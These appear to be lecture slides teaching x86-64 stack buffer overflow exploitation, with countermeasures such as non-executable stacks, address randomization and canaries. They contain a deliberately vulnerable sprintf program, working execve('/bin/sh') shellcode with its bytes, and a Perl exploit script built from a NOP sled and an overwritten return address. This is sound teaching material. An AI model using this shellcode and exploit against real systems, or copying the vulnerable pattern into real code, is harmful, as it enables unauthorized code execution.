Buffer Overflows
----------------

Slides inspired by Nelson Elhage, MIT 2008.
stuff.mit.edu/iap/2009/exploit/stack.pdf

But this will be an x86-64 version.

---------------

C vulnerability basics:

- Many standard library functions don't check that target arrays
  are big enough (e.g.: strcpy, sprintf, scanf, memcpy, ...)

- Main reason for this: pointers don't carry length information
  about the entity they point to.

- A secondary reason: strings are null-terminated; the length isn't
  available without traversing the string.

--------

A vulnerable C program:

#include <stdio.h>

void say_hello(char *name) {
  char buf[128];
  sprintf(buf, "Hello, %s", name);
  printf("%s!\n", buf);
}

int main (int argc, char **argv) {
  if (argc >= 2)
    say_hello(argv[1]);
}

------------------

Reminder: basic layout of memory:
(in all pictures, lower addresses are at bottom)

   ------
   stack
     |
     V
   ------

     ^
     |
   heap
   ------
   code
   ------

stack contains return addresses and local data

-----------------

X86-64 calling convention:

%rsp is the stack pointer
stack grows down
arguments passed in %rdi, %rsi, %rdx, ...
%rbp is the "frame pointer" and points to top of a function's stack frame
   (NB Not always used, e.g. in -O2)
%rax gets return value

---------------

Calling convention:

foo (1,2,3);

   movq $1, %rdi
   movq $2, %rsi
   movq $3, %rdx
   call foo          // pushes ret addr on stack and jumps to foo

-----------------

Prologue and epilogue:

foo: pushq %rbp
     movq %rsp, %rbp
     subq $<size of locals>, %rsp
     ...
     movq %rbp, %rsp   // or
     popq %rbp         // "restore"
     ret               // pops ret addr and jumps there

------------

Stack:

   ^ higher addrs
   |
   -----------------
   return addr
   -----------------
   saved frame pointer   <- %rbp
   --------------------
   first local variable
     .
     .
   last local variable   <- %rsp
   ---------------------
   stack grows
   |
   V

---------------------------

Stack for say_hello:

   ^ higher addrs
   |
   -----------------
   return addr
   -----------------
   saved frame pointer   <- %rbp
   --------------------
   buf (128 bytes)
   ---------------------
   stack grows
   |
   V

If we write past the end of buf, we can trash the return address!

-----------------------

Getting a shell:

- For the sake of example, we'll just get the target to call "/bin/sh"
- Use the raw execve system call
- execve (char *file, char **argv, char **envp)
- execve ("/bin/sh", ["/bin/sh", NULL], NULL)

NOTE: This is only interesting if we get some kind of privilege escalation...

------------------------

Linux X86-64 system call convention:

- Use "syscall" instruction
- System call number in %rax
- Arguments in %rdi, %rsi, %rdx, ...
- Return value in %rax
- Syscall number for execve (__NR_execve in /usr/include/asm/unistd_64.h)
  is 59 = 0x3b

-------------------------

Shellcode = the code we write that will invoke the system call to get a shell
(more generically, the exploit code we want to execute)

- Must be position-independent -- store data on the stack
- (in our case) must not contain NULs, because we're using a
  broken string routine (sprintf) to move the code into place
- various encoding tricks, e.g.:
    movl $0, %eax  ==>  xorl %eax, %eax

------------------------

Shellcode will build this stack:

   ....
   ---------
t: "/bin/sh"    <-- %rdi   [with trailing \0]
   ---------
   0
   ---------
   t            <--- %rsi, %rsp
   ---------

Watch out for little-endian conventions!
------------------

The shellcode:

   movabsq $0x68732f6e69622f20, %rax   // " /bin/sh"
   shr $8,%rax                         // shr to "/bin/sh\0"
   pushq %rax
   movq %rsp, %rdi                     // %rdi <- "/bin/sh"
   xorq %rax,%rax                      // %rax <- 0
   pushq %rax
   pushq %rdi
   movq %rsp, %rsi                     // %rsi <- argv (singleton array containing "/bin/sh")
   movq %rax, %rdx                     // %rdx <- envp (empty)
   addq $0x3b, %rax                    // %rax <- __NR_execve
   syscall

----------------------

apt@white-flipper:~/491/elhage$ gcc -c shellcode.S
apt@white-flipper:~/491/elhage$ objdump -S shellcode.o

shellcode.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000
:
   0:   48 b8 20 2f 62 69 6e    movabs $0x68732f6e69622f20,%rax
   7:   2f 73 68
   a:   48 c1 e8 08             shr    $0x8,%rax
   e:   50                      push   %rax
   f:   48 89 e7                mov    %rsp,%rdi
  12:   48 31 c0                xor    %rax,%rax
  15:   50                      push   %rax
  16:   57                      push   %rdi
  17:   48 89 e6                mov    %rsp,%rsi
  1a:   48 89 c2                mov    %rax,%rdx
  1d:   48 83 c0 3b             add    $0x3b,%rax
  21:   0f 05                   syscall

----------------------------------------------

So the plan is to fill the stack like this:

                     <- initial value of %rsp when shellcode starts
   ----------------
   pointer to buf    <- return address
   ----------------
   NOPs              <- fp
   ----------------
   NOPs
   ---------------
   shellcode
   ---------------
   NOPs
   ---------------   <- buf

We put NOPs (0x90) below the shellcode because we don't know
exactly where buf lives. A return that lands anywhere in the NOPs
slides up into the shellcode, which gives us some margin for error.

We put enough NOPs above the shellcode so that there will be room
for the shellcode's stack (3 x 8-byte entries in this case).

---------------------

hackit.pl:

#!/usr/bin/perl
my $shellcode =
  "\x48\xb8\x20\x2f\x62\x69\x6e" .
  "\x2f\x73\x68" .
  "\x48\xc1\xe8\x08" .
  "\x50" .
  "\x48\x89\xe7" .
  "\x48\x31\xc0" .
  "\x50" .
  "\x57" .
  "\x48\x89\xe6" .
  "\x48\x89\xc2" .
  "\x48\x83\xc0\x3b" .
  "\x0f\x05" .
  ("\x90" x 24);
my $landing = hex(`./getsp`) - 250;
#printf "landing = %x\n", $landing;
# 136 = 128 bytes of buf + 8 bytes of saved frame pointer
my $buffer = ("\x90" x (136 - length($shellcode) - length("Hello, "))) . $shellcode;
$buffer .= pack("Q", $landing);  # the two high order bytes are 0's, but that should be ok
#exec("echo", $buffer);
exec("./hello1", $buffer);

--------------------------------

To estimate the landing spot, we need to know where the stack starts
for an arbitrary program:

getsp.c:

#include <stdio.h>
int main () {
  unsigned long int rsp;
  __asm__("movq %%rsp, %0" : "=r"(rsp));
  printf("0x%016lx", rsp);
  return 0;
}

--------------------------

Demo!

----------------------------

Analysis: what went wrong here?
- no bounds checking in C
- mixed data and control information
- ability to execute data (on stack) as code

----------------------------

Countermeasures:

No-exec stack
Address-space layout randomization
Stack guards

Note: these are all in place by default; had to turn them off to get
the demo to work.

-----------------------------

Non-executable stack

- (Most) normal programs never need to execute code on the stack
- So why not disallow it?
- Requires HW support (only added fairly recently in x86)
- Demo (remove -z execstack)

--------------------------------

Counter-countermeasure: ret2libc

- Maybe we don't need to run our own code
- hello links in libc
- the standard system() library function can spawn /bin/sh for us
- get say_hello to return there instead
- issue: how to pass desired argument

-----------------

On old x86 (32 bit) arguments were passed on the stack rather than
in registers. (They live just above the return address.)

That makes it easy:

   t (approx)         <- argument for system
   ----------------
   AAAA               <- fake return address for system
   ----------------
   addr of system()   <- return address for say_hello
   ----------------
   spaces             <- fp
t: "/bin/sh;"
   spaces
   ---------------    <- buf

------------------

Alas, on x86-64, there's no way to feed the necessary address into %rdi.

Or is there? What if we can find a fragment of code in the library of the form

u: pop %rdi; ret

?? Then we can set up the stack as follows:

   ----------------
   addr of system()   <- return address for u's ret instruction
   ----------------
   t (approx)         <- will be popped by u into %rdi
   --------------
   addr of u          <- return address for say_hello
   ----------------
   spaces             <- fp
t: "/bin/sh;"
   spaces
   ---------------    <- buf

------------------------

Return-oriented programming:

Yes, we can typically find such a fragment!

In fact, more generally, we can find fragments to do all the things
we want to do, just before a return.

Then we can construct a program just by putting the addresses of
such fragments on the stack.
------------------------------------

Address-space Layout Randomization:

- The shellcode attack depends on our being able to guess the
  landing address in buf on the stack.
- The ret2libc attack needed the addresses of "system", "u" fragments, etc.
- But correct programs don't depend on stack locations
- And the dynamic linker can already handle flexible code locations
- So how about we randomize the addresses of the stack and code blocks?
  (Doesn't require HW support)
- Now typically enabled by default on Linux: can turn off using "setarch -RL"

-----------------------------------

Counter-countermeasures:

- There are other ways to hide an exploit on the stack that don't
  require knowing the sp.
- If the address space isn't too large, can just keep guessing addresses
  of system or code fragments. (Feasible for x86-32; not so much for
  a 64-bit address space!)
- There are often exploitable bugs in "random" address generation.

--------------------------------------

Stack guards:

- All the attacks depend on overwriting the return address.
- Can we protect it from modification, or at least notice?

----------------------

Canaries (stackguard, Crispin Cowan):

- Insert a known (typically random) value between locals and return address.
- Known as a "canary"
- Before returning, check to see that the canary is unchanged.

   -----------------
   return addr
   -----------------
   saved frame pointer   <- %rbp
   -------------------
   canary
   --------------------
   first local variable
     .
     .
   last local variable   <- %rsp
   ---------------------

- In recent gcc's, -fstack-protector does this, and also:
  reorders stack variables so that arrays all live *above* other vars,
  and args are copied to safe (low) locations on the stack.

Counter-countermeasures against stack guard:
harder, but sometimes can still exploit overwriting of data.

-----------------------------------------

Another simple idea: use two stacks, one for control, the other for data.
(Mainly a research idea now.)

----------------------------